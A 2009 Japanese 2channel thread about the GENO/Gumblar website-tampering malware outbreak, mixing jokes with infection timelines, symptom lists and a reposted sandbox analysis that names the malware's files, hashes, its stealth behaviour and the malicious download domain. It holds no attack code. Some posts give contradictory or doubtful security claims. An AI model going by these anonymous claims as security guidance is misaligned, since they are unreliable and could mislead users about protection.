　　　 `ーｧヘ.　　　　　　　＞'"＜ ﾊ　　　　　　┌────┐　　　　　／ ／￣￣| 　|
　　　　 ｒﾍ ＼＼ _,,... ‐'''",.　'"｀ ､/ |　　　 　　 └────|￣||￣||￣|￣　　 　／ ／
　　　　 ＼ ＼＞--‐ ''"´　　　／／　　　　　　 |￣￣￣￣　￣ ￣ /　/　　　 ／ ／
　　　　　　`l＜二二ニﾆ二ア‐ '´　　　　 　　　 ￣￣￣￣|＿|￣￣ ／　　 ／ ／
　　　　　 　 `ｰｒ-'､ﾉ|.|　　./　　　　　　　　　　　　　　　　　　　￣￣ 　　 ／ ／
　　　　　　　　 l＿_.ｿ,ﾄ- /　　　　　　　　　　　　　　PANDE　MIC 　　 く ／
　　　　　　　　　　　/`‐' |
　　　　　　　　 　　 |＿ソ

常にage続けるスレ。

別に同人サイトだけで流行してる訳じゃない
ゲーム公式から出版社、ペットの名付け方サイトまでやられてる
判明してないだけだ


ちなみに一番ひどかったのは、栄えある命名権獲得の
PCショップGENO

外出すればトンフルに感染し
引きこもっていれば小林製薬のGENOようじに感染し

俺はもうどうしたら（´・ω・｀）

>>217
いいまとめだ。
これのZDPエンジンてのが脆弱性対策用なんだよね。

こういうのってマイクロソフトに損害賠償請求できないの？
明らかにOSのアホ仕様が原因でそ。

同人サイトだけじゃないのか？
仕事でネットで調べものしても感染するのか？
そりゃヤバすぎるぞ。

スレタイに
「パンデミック？？」
とか、人目を引く言葉を入れてほしかったなぁ。

ageage

>>213
そのためにはまず濃密な肉体的接触を

>>216
Macがウィルスに強いというのは嘘だし
UNIX系OSだからウィルスに感染しないというのも嘘だ
Macはシェアが低いので狙われにくいだけで、OS Xそのものは非常に脆弱だ

Linuxでも同様にシェアが低いせいで攻撃を受けないで済んでいるという面はある
が少なくともLinuxはVistaと同等かそれ以上の保護機構は備えている
またyum/aptによるアップデートや管理の容易さはLinuxの大きな利点だ
だから私はLinuxがもっとも安全な選択肢だと信じる

愚か者はまとめてNGIDにした
こういうセキュリティ関連のスレで嘘を言って宣伝しようとするのは
実に卑怯なやりくちだ
私はこういう輩を軽蔑する

>>222
キャッシュ削除すれば問題ないなんて大嘘ついた罪は重い

martuz.cnから？pdf落とそうとするのがそーなの？

そういえば、明日｢先週末何してた？｣って訊かれた時に
「2chに張り付いてた」とか答えたくないんだけど、なんか気の利いた回答を教えてよ。

>>227
もうその手の詭弁が通用しなくなってることに気づけやw

>>220
ﾏｯﾃﾀ！

>>230
「Steamの週末セールでCoD WaWが半額だったので買ったけどもう飽きた」

ウイルス対策の情報収集してた･･･で。。。 >>230

なんでこんなに関心がないんだ？
知らん間に自分のサイトが発信源になってるかもしれんというのに

今回はavast!入れてて良かったと思う騒動だったな
小林製薬のサイトは行ってないけど

>>234
トンフルの方が命にかかわるからな

このスレタイじゃわかんないよ。

age

　　　　　　　　　　　 　 　　　＿＿＿
　　　　　　　　 　　 　 　　／　　 　　＼
　＿＿＿＿＿ 　 　 　／　　　 　 　　　＼
/　||￣￣￣￣||　　／　　　　　　　　　　　＼　　どうしてこうなった・・・
|.....||ＧＥＮＯ... ..||　　|　　　　　　　　 　　　　　|
|.....|| 　 　　 　 ||　 　＼　　　　　　 　　　　／
|.....||＿＿＿＿||　＿__/　/￣￣￣￣￣￣￣/
|￣￣￣￣＼三（＿　　/　　 　　　　　　　　/
|　　 　　 　　|　　　　　/　　 　　　　　　　　/

　　　　　　　　　　　 　 　　　＿＿＿
　　　　　　　　 　　 　 　　／　　　　 ＼
　＿＿＿＿＿ 　 ミ. 　／　　⌒　　⌒ ＼
/　||￣￣￣￣||　 　／　　 =⊂⊃=⊂⊃=＼　　どうしてこうなった！？
|.....||ＧＥＮＯ... ..||　　|　　　 　　（__人__）　　　|
|.....|| 　 　　 　 ||　ミ ＼　　 　 　`ー'´　　 ／
|.....||＿＿＿＿||　＿__/　/￣￣￣￣￣￣￣/
|￣￣￣￣＼三（＿　　/　 　　　　　　　　　/
|　　 　　 　　|　　　　　/　　 　　　　　　　　/

　　　　　　　　　　♪　 　　　＿＿＿
　　　　　　　　 　　 　 　　／⌒　　⌒＼　
　　　　　　　　 　　 　　／=⊂⊃=⊂⊃=＼　 ,⌒ヽ
　＿＿＿＿＿ 　 　_／　　　（__人__）　　　＼ゝ　ﾉ　　　どうしてこうなった！
/　||￣￣￣￣||　 （ |　　　　　|r┬-|　 　　　 |　 |　　　　　　どうしてこうなった！
|.....||ＧＥＮＯ. ...||　　| ＼　　　　`ー'´　 　　／ _ノ
|.....|| 　 　　 　 ||　 └‐、　　　　　　　　 　　　レ´｀ヽ
|.....||＿＿＿＿||　　　　｀/￣￣￣￣￣￣￣￣/　 　＼　　♪
|￣￣￣￣＼三.　　　　/　　 　　　　　　　　　/ノ｀ヽ,,__ﾉ
|　　 　　 　　|　　　　　/　　 　　　　　　　　　/

あげ続ける。

こんなに書き続けたら、そのうちピロシキから
２ちゃん使用料の請求書がくるかなぁ。

企業用のウイルスバスターはこれに有効なの？

この会社、みんなの就職活動日記でボコボコにされてた会社だｗ
めしうまｗｗｗｗ

マスクしてなかったの？＞小林製薬

なんかウィルスの変異だか何だかが早くて
ウィルス駆除ソフトが追い付けないとか何とか。

このスレタイじゃ誰も見ない。
本来なら勢いTOPになってて良いんだが・・・

GENOさんパネエっす

GENOてなーに

ググっただけでもヤバいと聞いて飛んできますた

この前のSay Move！と同じ奴か？

まぁスレタイ見るだけだったら小林なんていってないしおｋってなるわな
価格.comの時もそうだったし
サイト持ちから更に二次感染するってのが怖いのに

小林製薬と言えばこれはもう、

｢糸ようじ｣

で決まりでしょう。

めっちゃエライこってす。

自分のPCの予防も大変だけど、
それより何より、
明日、職場のみんなに何て言って
忠告しようかと。



「２チャンネルで見たんだけど…！」

orz

>>1
なんでこんなスレタイにしたのか。
これじゃまるきり小林製薬だけの問題みたいじゃん

新商品「菌撃退」

怖いなあ、２ちゃんも改竄されたりして

IE以外で閲覧しても危険なのかね

サイト見ただけでシステム書き換えられるとか、一体どうやったら
そんなこと出来るようになるんだよw ＞Windows（笑）

>>240

ビジネスセキュリティなら、対応している可能性もあるが、
コーポレートエディションは、オプションをつけていないと弱いカモね。

あくまで「可能性」ですが

ウィルス対策ソフトだけでは対応しきれん。

自分で対策できない会社のPCが不安だ・・・

ＨＤＤの電源を抜いてPuppy Linuxを使えばいいのですか？

vistaは大丈夫なんですか？

小林製薬のサイトなんて生まれてこのかた閲覧したことないから
改ざんでも何でも勝手にしといてくれ

小林製薬の
「ウイルスうつーる」

GENOの文字をタイトルに入れておいてくれー
関連スレ無いのかと思ったじゃないか

GoogleかYahoo!でニュースとしてあげといてくれれば、
同僚や上司に
「ニュースで見たんですが…！」
と言えるんだが…

>>257
そうですか、ありがとうございます。
アクロバツトを最新に更新します。

>>256
アプリの脆弱性があれば
Linuxでも可能

GENOはしょっちゅうウィルス蒔いてるな
何度目だコレ

製薬会社がウイルス感染とは皮肉な話だが
まあ別にコンピューター用の予防薬やワクチンを作っているわけでもあるまいし
それはそれで仕方ない

まあセキュリティーソフト会社がコンピューターウイルスに感染したら
それこそ最悪のイメージダウンになってしまうが
そういえば実際にそんな事件もあったな

>>260
UACが防いでくれる

心配する暇があったらAdobe ReaderとFlash Playerをアップデートしろよ

個人情報保護みたいなクレーマー歓喜！
のルールが無ければなあ
感染・媒介しないのがベストだが
万が一ウイルス感染してもまあ楽勝なのになあ

>>257
その前にＮＷセキュリティとかの
パターンファイルでブロックされてる罠

191 名前：名無しさん＠九周年[sage] 投稿日：2009/05/17(日) 21:16:43 ID:Kfvmxa+T0
ここにもキチガイどもが集まりつつあるようだ

198 名前：名無しさん＠九周年[sage] 投稿日：2009/05/17(日) 21:22:24 ID:Kfvmxa+T0
可愛い腐女子に手取り足取りLinuxの使い方を教えてあげたい

どっちがキチガイかｗ

>>264
俺と同じ悩みだｗｗ
２ちゃんソースの悲しさ

また小林かよ

>>248
うん。

>>268
>セキュリティーソフト会社がコンピューターウイルスに感染

昔どっか外国の話で聞いたような記憶が・・・

動画サイトをみたいので
java-scriptは常時OFFにできないしフラッシュプレイヤーも削除できない
GENOウィルス怖い

・ウィルスの通称
・現在爆発感染中
・ウィルス対策ソフトでは駆除しきれない
・感染したらPC初期化しか手はない

この情報のどれか一つくらいは
スレタイに入れてほしかったな。

ウイルスに感染したら薬を飲めというメッセージを自ら示したんだろ？

さっき知って慌てて自分のサイト確認したぜ・・・
感染してないようでよかったが…

>>266
相手しないほうがいいよ
話が通じる奴じゃなさそうだ
ID変えて同じ事を九官鳥のように繰り返しレスしてる
案外こいつがウィルスの作者だったりして

>>272
腐女子に欲情したからってキチガイ扱いﾋﾄﾞｽ

>>266
システムはroot権限でしか書き換えらないのに、どうして一般権限
で動いてるアプリから書き換えられるんだ？w

>>280
動ナビか？

ウィルス対策ソフトのウィルス○スターをインストールして、起動不能になることはあったね。
それとウィルスバ○ターの開発元が、ウィルスに感染したこともあったね。

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

ＰＣのウィルスが何だ！
自分の体が在ってこそのＰＣだろ！

【WH○】”水酸の危険性”より

・水酸　（DHMO）とは
・水酸と呼ばれ、酸性雨に含まれる成分の1つである
・温室効果により各種異常気象を引き起こす
・原子炉内で存在が確認されている
・東海村臨界事故の原因の１つである
・重篤なやけどの原因となりうる
・末期がん患者の悪性腫瘍から検出される 
・その危険性に反して、DHMOは頻繁に用いられている
・工業用の溶媒、冷却材として用いられる 
・多くの材料の腐食を進行させる
・各種の動物実験に用いられる 
・現在も防虫剤の散布に用いられており土壌入換え後も
DHMOは残留し産物に悪影響を与える
・欧州では6000人の死者が出ている
・戦後の日本の広島市内だけで1,1００人前後が死亡している

>>269
ありがとうございます！
Adobeとフラッシュはもうアップデートしました

ニフティセキュリティで確認･･･アウトでした。

駆除、削除してもすぐに復活。

バックアップして、しばらくネット謹慎です。

皆さんも、ニフティセキュリティで確認してみ

砂箱か仮想からなら安全？

サイトを見ていなければ大丈夫じゃないのか。
カスペルスキーの最新版常駐させて、スキャンして大丈夫だったら、心配無い？

>>281
こういうセキュリティ関連のスレで本音を言って欲情しようとするのは
実に卑猥なやりくちだ
私はこういう輩を軽蔑する

だからニフセキュリティで確認しろってwww

>>283
なんのことか分からんかったからググっちゃったじゃないかｗ

とりあえず同人板のスレでGENOウイルス云々言ってたからまとめ見て確認した
サイトの頭にでっかく注意喚起も書いといたよ

再起動してみてブルー画面でたらアウト
VISTAは条件によるがほぼ無傷

これまでのあらすじ

04/04(土)
PC一般板のGENOスレで「GENOのサイトが改竄されている」との報告が出る。(10:43)
スレでの報告から、GENOサイトにアクセスするとウィルスに感染する可能性があることが明らかになる。
ν速にスレが立つ。(20:26)
改竄されたまま一日を終える。

04/05(日)
この日の夜から短縮URLによる各板へのウィルス爆撃が本格化。多数の犠牲者が出る。
GENOの店舗に赴いた有志が店員にこの一件を尋ねる。「Webのことは店舗ではわかりません」
セキュリティ板で通販サイト juicyrock.co.jp もGENOと同様の改竄を受けていることが報告される。
楽天のショップ www.rakuten.ne.jp/gold/i-na/ でGENOウィルスを検出したという話題が出る。
GENOサイトは完全放置のまま1日が終わる。

04/06(月)
社員がようやく出社してきたのか、サイトがメンテナンス中になる。(10:00頃)
※ただし「メンテナンス中」に切り替えたのはトップを含む数ページのみで、
未だ改竄された商品ページなどにアクセス可能だった。

価格.comなど価格比較サイトからGENOへのリンクが消える。
GENOウィルス事件をガジェット通信が報じる。livedoor、exciteに配信される。(12:32)
juicyrock.co.jp が403になる。その後復旧、「お詫び」が発表される。
www.rakuten.ne.jp/gold/i-na/ のページが真っ白に。その後何事もなく再開。
GENOが再開。「サーバーに一部不具合がございました」(20:20頃)
再開したものの、未だ改竄されたままであることが報告される。その後しばらくして正常に。

04/07(火)
GENO、再度改竄される。(8:00頃)

以下は、http://www29.atwiki.jp/geno/pages/21.html　でお読みくださいｗ

GoogleかYahoo!でニュースにあげてくれーー

ageage

他の板見たら怪しいアドレスてんこ盛りでﾜﾗﾀｗ

お前らー

東方
ボカロ

大手サイト感染済みだからなー
踏んだニコ厨はPCクリーンインスコしとけよー

>>110
これを他に流用する馬鹿が絶対出てくる

>>282
システムじゃなくても自身のhomeディレクトリなら書き換えられるという言い回しですか？

>>295
ちょｗ
事実だしGENOの態度はムカツクけど
今回の蔓延の件とGENOHP感染が直接関係あるかわからないのに
なんて偏った情報ｗｗｗ

>>255
火狐やオペラでも感染する

「小林製薬のサイトは見てないから大丈夫」とか言う奴は情弱。
既に国内だけで100以上のサイトに感染が広がっている。
明日になればその十倍〜数百倍以上になる見込み。

ここのサーバーは何で感染した訳？
microsoftのサーバーOSだったの？

いまどきWindowsでネットとかどんだけ情弱なんだよw
わけわかんないことで時間と金いくら無駄にしてるか考えてみろよw

あげ続ける

>>301
GENOが蔓延を助けたのは事実。
なんら偏ってない。
「キャッシュ削除しとけば大丈夫」みたいな説明しかしなかったために、
それを鵜呑みにした利用者が自分のHPを感染させ、さらに蔓延させてる。

>>305
ナに使ってるの？

>>304
今回サーバーは関係ない。
コンテンツの更新用PCがウイルス感染して汚染されたソースをサーバーにアップした。

できるだけネサフしないようにしないとな

>>304 >>307
ん〜と、
1. 感染しているサイトを開いたPCが感染。
2. そのPCで自分のサイトをいじる（ファイルのアップロード等）。
3. その結果自分のサイトも感染。
4. そのサイトを見た人にも感染が広がっている。

……ってことでOK？
ついでにage

>>309
なるほど　thx!!

GENOってさぁ・・・自鯖で自ドメイン？
もし仮に拡散の元凶であったら
賠償とかあるのかな？

mac2台とwin2台所有してるがネットはもう携帯電話でしかしてない

>>311
thx!
おいらもage

今まとめwikiすごく重いね

断崖の頂上に浮かぶマリア像は

小林製薬の糸ようじ

閲覧ウイルスに新型ウイルスに、どんだけニュー速+にウイルススレあるんだよ

早く★２になあれ。

もっと目立つスレタイになりますように。

マックに替えて悠々とエロサイト巡り中のオイラが通りますよ・・・

>>304
BIG-server.com binboserver.com メンテナンス / 障害報告
Lastupdate : 2009/05/14 19:07

今回改ざんを受けたのは【ぷろじぇくと ぞうさん】のトップページです。
http://www.maido3.com/server/zousan/index.html

その後の調査の結果では【ぷろじぇくとぞうさん】を更新した
2009年5月13日午後6時30分以降に改ざんされた可能性が高いと思われます。

このJavaスクリプトは、本来のサイトとは違うサイトから
ウィルスやスパイウェアなどをダウンロードするものです。

このため期間内に【ぷろじぇくとぞうさん】にアクセスされた方の
パソコンに感染の恐れがあります。

大変お手数をおかけいたしますが、お心当たりがございましたら
ご利用のパソコンの安全をご確認ください。

maido3.com ホームページでウィルスに感染した恐れがある場合の対応について
http://www.maido3.cc/server/release/2009/200905082023.html#03


弊社では引き続きウェブページの改ざんが行われた原因と経緯を調べ、
再発防止に向けた対応を行います。

まだまだ広がるのかな？
とりあえず慌てないのが一番なのかな？

>>39
化粧品会社のサイトは有無を言わさず
クソ思いFlashが作動する
馬鹿女は気にしないんだろうけど
映画配給関連だと、いきなり映画の予告再生とかさ
いきなり爆音がして何かと思うわ
二度と見たくないわな

マック・ビスタ・マイクロソフト最新連合大勝利！
XP涙目ｗ

>>31
JavaScriptはJSと略せ

糸ようじ！

>>324
じょ…女子小学生……

2000,XP,(VISTA?)でなければおけ？
会社のはXPだわん

サイトの改ざん被害が糸ようじ
小林製薬の糸ようじ

ウィルスバスター入れてますが、防げますか？

軽くて好きなんでAdobe5.0使ってるんだが
危険なら最新にした方がいいとは思うけど

むしろ5.0ぐらいだと既に古くて相手にさえされてない気も
そして最新にすると今度
むしろ最新版の脆弱性を狙われるような気がするし

どう思う？
自分の好き嫌いだけでは判断しかねてるので
ぜひ意見を聞いてみたいんだが

はじめてvistaで良かったと思った

ここで聞くよりセキュ板いけ
GENOが蔓延させてからもうずっとヤバイ状態なのに今頃＋にスレ立った所でに手遅れ

まだまだ広がるんじゃなくて
もうとっくにヤバいレベルで広がってます

クレカパス抜かれたりするからきをつけろよ

因みにノートン先生他セキュリティーソフト全スルーだからな

ここはどっちかというと周知役かな？
”安易にリンク踏むとやべぇ！”って事実だけでも・・・

VistaはNT3.51の遺志を継いだOSだからな
7では多少堅牢生は落ちるだろうが

企業サイトもあちこちやられて、今現在まだ某出版社は感染したまま。
けっこうな騒ぎになってたのに何日も経たないとスレ立てなかったここの記者もどうかと。
まったく危機感足りないよなｗ

>>311
ちょっと違う>>55見れ
小林製薬の中のPCがウィルス感染してパス盗まれ
そのパスでサーバにFTPでウィルスアップロードされた
他の感染サーバも同じかどうかは知らない

>>324
JScriptもまとめてJSに出来るから女子小学生でも安心だな

>>331
vistaだからって抜かるなよ？
感染した奴が知るやら云々、亜種で感染するかもしんないし

ぷりんてぃん感染？ワロスｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと＝システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS９以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。

>>336
その　某出版社　ってのちゃんとここで名前出してあげないと
知らないで見に行って感染する人出てくるよ
リンク入れる必要は無いけど、感染確認情報はハッキリとおねがい

>>340
成美堂出版だっけ、まだ対応して無いのか

ぷりんてぃんﾅﾂｶｼｽ
ググったらWikipediaに解説ページまであるし

>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染
>ぷりんてぃん感染

ｷﾞｮﾜｰ

あんまり盛り上がってないのん
芸スポ板いったら松本人志結婚だってね

解析進んだみたいだけどどうにかなるのかこれ

>>344
女と結婚したとは驚いた

　　糸　　小　 改 　ウ
　　よ　　林　 ざ　 ェ
　　う　　製　 ん　 ブ
　　じ　　薬　 被　 サ
　　　　　の　　害　 イ
　　　　　　　　 に　 ト
　　　　　　　　　　 　の

てか小林製薬は外部からのFTP空いてたのね？

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
　え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
　作成されるファイルを仮想PCで確保してみました。
　ベンダーに提出するかどうかの判断は各自にお任せします。（一応、KasperskyとAVIRAには送ってあります。）

　muvl.exe　(元の名前 muvl.nug) - ランダム作成らしい。
　　MD5 : 3862b349b9b5c9283925e181ff9f5bf8
　　http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)

　sqlsodbc.chm - ただのダミーファイルです。（中身は無意味なテキストと空白）
　　MD5 : 34cd61d83853e511f0a28027f639a1c9
　　http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)

　muvl.exeは、中身に合わせて拡張子を変えてあります。（ベンダー提出時に捨てられないように）

　gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
　対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

　sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
　感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
　ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

　あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
　バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

　このマルウェアは、感染時に元の実行ファイル（martuz.cnから落ちてくるxxxx.exe）の方を消去（証拠隠滅）
　するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

>>348
自鯖じゃなくてレン鯖かホスティング
IP制限もしてなかったんだろうねこの書き方じゃ
制限してても内部のPCがbot感染したらそこを串にされる可能性あるけど
FTPじゃなくてSSHだったとしても秘密鍵盗まれたら同じだし

ぷりんてぃんもXPだったのかな

何か結局一日中、セキュ板同人板その他色々な板に張り付いてROMってて一日が終わったｗ

今頃知ったわ。
こんなことニュースでやってたっけ？
セキュリティのこと何も知らずにネットやってるからこわいな…。
親はウィルスの存在さえ知らずにネットしてるし…。

>>349
こええええええええ
このウイルス本気でタチ悪いな
頼むからもっとスレ伸びて目立ってくれ

>>351
チェックしに行ってくれよ俺怖い

2ch感染とかいったら大変なことだなｗ
ごめん冗談にならんね

6 名前：GENOウイルス＠お腹いっぱい ：09/05/17 18:21:58 ID:di7dr/Jr
２月に私のＰＣが感染
特殊清掃系のサイトから感染
ＧＥＮＯで言われてる症状とまったく同一でした
最終的にはリカバリしか手の内ようがないと判断しリカバリ済み
この時ノートンでは感知しなかった、ノートンがあるから安心してたのに

先週は友人が感染したといってました
友人は同人系のサイトから感染、同じくノートン入れてたが
感知せず。Ｃドライブのみリカバリとのこと

感染時のＰＣの様子
レジストリ、コマンドは立ち上がらず
セキュリティサイト及びスパイウェア系サイト繋がらずエラーになる
フリーズして勝手に電源が切れてしまう
起動時に頻繁に青い画面が出てくる



特殊清掃系とはどこぞやｗ
まぁ、閲覧者は少なそうだけど

>>354
「GENO」で検索してたから＋に立ってるの気付かなかったくらいだからな・・・

平たく言うと一般に出回ってる駆除ソフトは基本的にパターンマッチで削除する
だけどこのGENOウイルスはそれをごく短い周期で変えてるから
今のとこどうやって対応すればいいのか分からん状態
変化に規則性があればいいんだが

うはｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ空気感染したｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

親に注意しろって言ったら
「そのくらい自分で調べられる、馬鹿にするな」ってキレられたｗｗｗ
ついこの前「拡張子って何？」って聞いてきた情弱のくせにｗｗｗｗｗｗｗｗｗｗｗ

カンだけど特殊清掃系は死体画像サイトの事じゃね？

今日の糸ようじスレはここですか？

まとめ

>>4 >>17 >>19 >>28 >>35 >>51 >>58 >>253 >>262

>>282
それをいうならWindowsも同じ理屈なんだがｗ

>>361
・・・まったく、腐女子のすることは・・・ｗ

他の賑やかなスレに、このスレを告知して回ってるよ。
マジやばい。

>>360
まあWindowsでネットやってる時点で情弱だわな・・・

>>1
ハルヒが描いたSOS団のロゴ、それを貼り付けたHPを見ると・・・

世間は新型インフルエンザでネットの世界はGENOウィルス…
後者の方がこわいな、自分には

通りすがりのWinMEだお

現実では豚インフルエンザ
仮想ではGENO

忙しい

まとめサイトの転載ね

主な症状
* sqlsodbc.chmを改変
* cmd.exe、regedit.exeが起動不能
* 一部のアンチウイルスソフトが更新不能
* 特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
* ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
* Googleの検索結果を改竄(リンクを弄る)
* explorer.exeや一部のブラウザが異常終了
* Acrobatが勝手に起動
* PDFファイルやシステムファイルが増殖
* CPU、メモリ使用率がUP
* 再起動時にBSOD(＝Blue Screen Of Death、青いエラー画面）
* タスクトレイから常駐アイコンが消える（主にセキュリティソフト関係）

感染・改竄の流れ
* 「感染したサイト」を見ると自分のPCも感染する
* 「感染した自分のPC」で感染していないサイトを見てもそのサイトは感染しない
* 「感染した自分のPC」でサイトの更新をしている人はパスが抜かれるので、そのサイトが感染される
* 「感染したサイト」を感染していないPCで別の人が見ると(ry

>>365
女は人間の死に性的興奮をおぼえるらしいからな
通夜の席は艶の席

しかしＧＥＮＯウイルスの作成者ってマジ頭いいな
こんなウイルスばら撒いてる暇にもっと金になる仕事やればいいのに・・・

ってクレカの番号抜いたりできるからそれで金儲け？ｗ

通常は制限ユーザーで仕事。
これ最強

>>374
マジで中国黒社会当たりのヤクザ子飼いのクラッカーが詐欺用に作ったのかもな

とりあえず次スレは（小林製薬）いらんな
大手企業サイトが次々と感染、くらい書いていい

>>178
個人のpcだ。

FX3はNoscript使ってるけど
IEはどこいじればいいんだっけ、設定でfaildにできたっけ？
あんまり使ってないから忘れた

>>376
どこの企業だか忘れたけど、アメリカで自社サイトを攻撃したハッカーを
セキュリティ担当者として採用したという話聞いたことあるな

ビスタデフォのユーザーアクセスコントロール有効なら大丈夫
切ってた自称情強は涙目ｗ

>>380
最近じゃあまり聞かないよそういうの
アメリカで自社サイトに侵入テストしたセキュリティ担当者が
問答無用でクビになった話なら知ってるけど

>>364

ところがWindowsはroot（管理者）権限でアプリも動かすことが推奨なんだなw
だからアプリの穴、即システムの穴になる。
Vistaでようやくアプリ=一般権限、システム＝管理者権限に分けたが、
今度は今まで使えてたアプリが動かなくなるというマヌケっぷり。

>>382
侵入テストじゃなくて侵入な
承諾を得てからやるのが侵入テストで
その場合は首になり得ない

Vistaが珍しく評価されたが
なんかMSの企みなんじゃねーの？

>>383
いまどきVistaより前の話されてもｗ

とりあえずavast!では何も出なかったが心配だな

>>350
ただまあ、各種SSHクライアントの挙動を監視して秘密鍵ゲットするのは敷居高いわな
トラフィック監視ですむFTPやHTTPの盗聴のがお手軽よね

明日、会社大変そうだなー。
感染してなきゃいいが、間違いなく感染してると思われ。

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
　え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
　作成されるファイルを仮想PCで確保してみました。
　ベンダーに提出するかどうかの判断は各自にお任せします。（一応、KasperskyとAVIRAには送ってあります。）

　muvl.exe　(元の名前 muvl.nug) - ランダム作成らしい。
　　MD5 : 3862b349b9b5c9283925e181ff9f5bf8
　　http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)
　sqlsodbc.chm - ただのダミーファイルです。（中身は無意味なテキストと空白）
　　MD5 : 34cd61d83853e511f0a28027f639a1c9
　　http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)
　muvl.exeは、中身に合わせて拡張子を変えてあります。（ベンダー提出時に捨てられないように）

　gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
　対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
　qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
　感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
　ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

　
　あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
　
　バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

　このマルウェアは、感染時に元の実行ファイル（martuz.cnから落ちてくるxxxx.exe）の方を消去（証拠隠滅）
　
　するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

そんなに感染してるんだ
新型インフルエンザよりもやばそう

>>380
日本でもUG TOPってアングラサイトの管理人がセキュリティ会社開業したけど。

>>388
トラフィック監視じゃなくてキーロガーだと思う
それならパスフレーズも盗めるし、秘密鍵を暗号化していなければイチコロ
やっぱりワンタイムパスワードも併用しないとだめかなあ

>>392
んな泥棒の立てた警備会社に仕事頼む人居るのか

pdfは使わないからアンインスコしたがFlashは悩む・・・

>>385

別にVistaが評価されてるわけじゃないよ。
XPでもユーザーを一般権限にして使えば感染は避けられる。
でも今まで使ってたアプリも動かなくなる可能性が大。
Vista同様にねw

>>383
>今まで使えてたアプリが動かなくなるというマヌケっぷり
ＯＳがアップグレードしたらサポートしきれないアプリが出て当たり前だろ

>>31
つ、つられないからねっ！

>>374
これとか？
http://news.bbc.co.uk/2/hi/programmes/click_online/7932816.stm

結構重大なことだ思うけど全然スレ伸びねぇな

セキュリティは儲からない
セキュリティのスレは伸びない
これ常識

>396
へーなるほどなあ
>>383もだけど
XPの一般権限と管理権限
なぜVistaで動かないのが多いのかってのは
そういう理屈だったんだ

また一つ賢くなったよありがとう
顧客に玄人っぽく偉そうに話ができる

400
だってこのスレタイじゃ誰も興味もたんわ
ま素人が興味もったらもったでパニックになるだけだがな

>>380
ゴルゴに出てきたナカヤマは自分のすごさを知らずにNSAに守られてるけどな。

こえー
ネットの世界でも引きこもらなきゃならんのか・・・

製薬会社なんだからワクチン作成汁

>>402
でもVistaで動かないのって
自作とか素人の作ったフリーソフトとかであって

商用ソフトでいまどき動かないのは皆無

こういう報告があがってた

433 名前：401[sage] 投稿日：2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。　
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe，レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。

これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。　
同人板その他、パンデミック状態になったの理解できるわ。





感染したことに自覚症状がないなら、騒ぎが広まらないのもわかるｗ

>>400
スレタイが悪いし、ageる奴が少ないし、ニュースに出ないし
かくいう俺も、ついさっき同人サイトでこのスレ知ったし
これからこのウイルスの情報が広がる流れだな

ヤホーとニコニコが伝えるだけでも、一気に広まるだろうけど、なにしてるんかね

こうしてる間にも知らずにボコボコ感染してると予想

>>408
つまり何だそれはあれか

あれか

このクレカのパスとかの送信先を割り出せば犯人が居るんじゃないの？

>>379
NOSCRIPTって使う意味ある？
